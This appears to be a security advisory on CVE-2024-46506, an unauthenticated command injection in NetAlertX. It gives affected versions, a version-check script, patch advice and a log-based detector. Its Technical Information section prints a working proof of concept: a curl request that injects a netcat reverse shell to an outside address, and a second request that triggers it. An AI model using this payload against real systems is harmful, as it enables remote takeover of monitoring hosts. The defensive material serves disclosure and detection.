
NetAlertX Under Siege: Unauthenticated RCE Exploit (CVE-2024-46506)

A critical unauthenticated command injection vulnerability in NetAlertX (CVE-2024-46506) is actively exploited, enabling attackers to execute arbitrary commands remotely.


Introduction

NetAlertX, a widely adopted open-source network monitoring tool, faces a critical security threat with CVE-2024-46506, an unauthenticated remote code execution vulnerability actively exploited in the wild. This severe flaw allows attackers to execute arbitrary commands remotely, posing a significant risk to thousands of deployments.

Affected Systems and Versions

NetAlertX versions 23.01.14 through 24.x before 24.10.12 are vulnerable. Specifically, the vulnerability affects configurations utilizing the 'util.php' endpoint without proper authentication checks.
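The version range above is the kind of thing an asset inventory should check mechanically rather than by eye. The following helper is an added example written for this article, not code from the NetAlertX project; it encodes only the range stated here (23.01.14 inclusive through everything below 24.10.12) and assumes the project's date-style version strings, optionally prefixed with "v".

```python
import re

# Range as stated in the advisory text: 23.01.14 <= version < 24.10.12.
FIRST_VULNERABLE = (23, 1, 14)
FIRST_FIXED = (24, 10, 12)


def parse_version(version: str) -> tuple:
    """Turn a NetAlertX-style version string such as '24.10.12' or 'v24.7.1'
    into a comparable tuple of integers. Trailing non-numeric suffixes
    (e.g. '-beta') are ignored; a malformed string raises ValueError."""
    cleaned = version.strip().lstrip("vV")
    m = re.match(r"^(\d+)\.(\d+)\.(\d+)", cleaned)
    if not m:
        raise ValueError(f"unrecognised version string: {version!r}")
    return tuple(int(part) for part in m.groups())


def is_vulnerable(version: str) -> bool:
    """True if the version falls inside the range the advisory names as affected."""
    v = parse_version(version)
    return FIRST_VULNERABLE <= v < FIRST_FIXED


def triage(versions):
    """Map each inventoried version to 'vulnerable' / 'not affected' / 'unparseable'."""
    result = {}
    for ver in versions:
        try:
            result[ver] = "vulnerable" if is_vulnerable(ver) else "not affected"
        except ValueError:
            result[ver] = "unparseable"
    return result


if __name__ == "__main__":
    # Constructed sample inventory, not real hosts.
    for ver, verdict in triage(["23.01.13", "23.01.14", "v24.7.1", "24.10.12", "garbage"]).items():
        print(f"{ver:>10}: {verdict}")
```

Anything reported as "unparseable" should be checked by hand rather than assumed safe; the checker deliberately refuses to guess.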

Technical Information

The vulnerability arises from the absence of authentication in the 'util.php' file's 'saveSettings' function. Attackers exploit this by directly sending unauthenticated POST requests, modifying plugin configurations such as 'backup_handler', which executes system commands without input sanitization:

curl -X POST http://target:20211/php/server/util.php \
  -d 'function=savesettings&plugins={"backup_handler":{"command":"rm -f /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc 10.0.0.1 4444 >/tmp/f"}}'

Triggering payload execution via a reload request:

curl http://target:20211/php/server/util.php?function=reload

This results in arbitrary command execution, often granting root-level access.

Proof of Concept

A working PoC exploit is demonstrated above using curl commands. Attackers can easily adapt this method to deploy reverse shells or other malicious payloads.

Patch Information

Users must immediately upgrade to NetAlertX version 24.10.12 or later, available from the official repository.

The patch introduces robust authentication checks and input sanitization to mitigate exploitation.

Detection Methods

Monitor logs for POST requests to 'util.php' with 'function=savesettings'. Investigate unusual processes spawned by NetAlertX, particularly those involving reverse shells or unexpected outbound connections.
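The detection guidance above can be turned into a small log review script. The code below is an added example written for this article, not a NetAlertX component; it assumes the web server in front of NetAlertX writes standard combined-format access logs and that the endpoint path matches the one shown in the PoC (/php/server/util.php). Because POST bodies do not appear in access logs, any POST to util.php is flagged, a visible function=savesettings parameter raises the severity, and a function=reload request from the same source shortly after a settings write is reported as the likely two-step pattern described in the Technical Information section. The sample log lines are constructed for the example.

```python
import re
from datetime import datetime, timedelta
from urllib.parse import parse_qs, urlsplit

# Combined log format: ip ident user [timestamp] "METHOD target PROTO" status size
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) \S+" (?P<status>\d{3})'
)
TS_FMT = "%d/%b/%Y:%H:%M:%S %z"
UTIL_PATH = "/php/server/util.php"  # endpoint path as shown in the PoC


def parse_line(line: str):
    """Parse one access-log line into a dict, or None if it is not in the expected format."""
    m = LOG_RE.match(line)
    if not m:
        return None
    parts = urlsplit(m.group("target"))
    query = parse_qs(parts.query)
    return {
        "ip": m.group("ip"),
        "ts": datetime.strptime(m.group("ts"), TS_FMT),
        "method": m.group("method"),
        "path": parts.path,
        # Compared case-insensitively: the page refers to both 'saveSettings' and 'savesettings'.
        "function": query.get("function", [""])[0].lower(),
        "status": int(m.group("status")),
    }


def find_suspicious(lines, window=timedelta(minutes=10)):
    """Return (severity, ip, description) findings for util.php activity.

    Severity ladder:
      medium   - POST to util.php (body not logged, so always worth a look)
      high     - function=savesettings visible in the query string
      critical - reload request from an IP that wrote settings within `window`
      low      - reload with no preceding settings write from that IP
    """
    findings = []
    last_write = {}  # ip -> timestamp of most recent settings write
    for line in lines:
        ev = parse_line(line)
        if ev is None or not ev["path"].endswith(UTIL_PATH):
            continue
        if ev["function"] == "savesettings" or ev["method"] == "POST":
            sev = "high" if ev["function"] == "savesettings" else "medium"
            findings.append((sev, ev["ip"], f'{ev["method"]} to util.php (function={ev["function"] or "?"})'))
            last_write[ev["ip"]] = ev["ts"]
        elif ev["function"] == "reload":
            prior = last_write.get(ev["ip"])
            if prior is not None and ev["ts"] - prior <= window:
                findings.append(("critical", ev["ip"], "settings write followed by reload within window"))
            else:
                findings.append(("low", ev["ip"], "reload with no recent settings write from this IP"))
    return findings


# Constructed sample log; 203.0.113.x is a documentation range, not a real source.
SAMPLE_LOG = [
    '10.0.0.5 - - [12/Oct/2024:10:00:01 +0000] "GET /index.php HTTP/1.1" 200 512',
    '203.0.113.7 - - [12/Oct/2024:10:05:12 +0000] "POST /php/server/util.php HTTP/1.1" 200 18',
    '203.0.113.7 - - [12/Oct/2024:10:05:20 +0000] "GET /php/server/util.php?function=reload HTTP/1.1" 200 2',
    '10.0.0.9 - - [12/Oct/2024:11:30:00 +0000] "GET /php/server/util.php?function=reload HTTP/1.1" 200 2',
]

if __name__ == "__main__":
    for sev, ip, desc in find_suspicious(SAMPLE_LOG):
        print(f"[{sev:>8}] {ip:<15} {desc}")
```

The correlation window is a tuning knob: a legitimate administrator also saves settings and reloads, so the "critical" finding should be read together with the source address (is it an expected management host?) and, as the text recommends, with a look at child processes of the NetAlertX PHP worker for shells or unexpected outbound connections.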

Vendor Security History

NetAlertX has faced challenges with timely and complete security patches. Initial patches for CVE-2024-46506 were bypassed, necessitating subsequent updates. This highlights the importance of vigilant patch management and security auditing for users of NetAlertX.
